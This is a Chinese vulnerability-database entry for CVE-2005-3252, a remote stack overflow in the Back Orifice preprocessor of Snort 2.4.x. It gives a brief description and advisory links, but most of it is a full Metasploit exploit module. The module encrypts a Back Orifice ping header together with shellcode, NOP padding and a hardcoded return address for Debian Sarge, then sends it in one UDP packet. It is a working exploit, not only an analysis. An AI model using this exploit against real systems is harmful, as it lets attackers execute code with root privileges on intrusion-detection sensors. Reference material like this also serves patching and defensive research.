Snort Back Orifice预处理器远程栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109147 漏洞类型 缓冲区溢出
发布时间 2005-10-18 更新时间 2006-08-24
CVE编号 CVE-2005-3252 CNNVD-ID CNNVD-200510-133
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/10026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-133
|漏洞详情
Snort是Snort团队的一套网络入侵预防软件与网络入侵检测软件。该软件提供数据包嗅探、数据包分析和数据包检测等功能。很多其他IDS产品中也使用了Snort及其组件。Snort的BackOrificeping预处理模块存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在Snort探测器上执行任意指令。Snort预处理器是一些模块化的插件,通过在运行检测引擎前操作报文来扩展功能。BackOrifice预处理器解码报文以判断报文中是否包含有BackOrificeping消息。ping检测代码未能充分的限制从报文中读取到固定长度缓冲区中数据的数量,这样导致可能出现缓冲区溢出。攻击者可以通过发送单个特制的UDP报文导致在目标系统上执行任意代码。
|漏洞EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
			'Description'    => %q{
				This module exploits a stack overflow in the Back Orifice pre-processor module
			included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could 
			be used to completely compromise a Snort sensor, and would typically gain an attacker
			full root or administrative privileges.
			},
			'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
				],
			'Payload'        =>
				{
					'Space'    => 1073, #ret : 1069 
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'      => 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0))
	

		# Configure the default port to be 9080
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)

	end

	def msrand(seed)
		@holdrand = 31337
		end

	def mrand()
		return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
		end

	def bocrypt(takepayload)

		@arrpayload = (takepayload.split(//))

		encpayload = ""
		@holdrand=0
		msrand(0)

		@arrpayload.each do |c|
			encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
		end

		return encpayload
		end


	def exploit
		connect_udp
		
		boheader =      
			"*!*QWTY?"  +
			[1096].pack("V")  +           # Length ,thanx Russell Sanford
			"\xed\xac\xef\x0d"+           # ID
			"\x01"                        # PING
		
		filler =
			make_nops(1069 -(boheader.length + payload.encode.length))

		udp_sock.write(
			bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
		)
		
		handler
		disconnect_udp
	end

end
|参考资料

来源:US-CERT
名称:TA05-291A
链接:http://www.us-cert.gov/cas/techalerts/TA05-291A.html
来源:US-CERT
名称:VU#175500
链接:http://www.kb.cert.org/vuls/id/175500
来源:ISS
名称:20051018SnortBackOrificeParsingRemoteCodeExecution
链接:http://xforce.iss.net/xforce/alerts/id/207
来源:www130.nortelnetworks.com
链接:http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=
来源:www130.nortelnetworks.com
链接:http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=
来源:www.snort.org
链接:http://www.snort.org/docs/change_logs/2.4.3/Changelog.txt
来源:BID
名称:15131
链接:http://www.securityfocus.com/bid/15131
来源:OSVDB
名称:20034
链接:http://www.osvdb.org/20034
来源:VUPEN
名称:ADV-2005-2138
链接:http://www.frsirt.com/english/advisories/2005/2138
来源:SECTRACK
名称:1015070
链接:http://securitytracker.com/id?1015070
来源:SECUNIA
名称:17559
链接:http://secunia.com/advisories/17559
来源:SECUNIA
名称:17255
链接:http://secunia.com/advisories/17255
来源:SECUNIA
名称:17220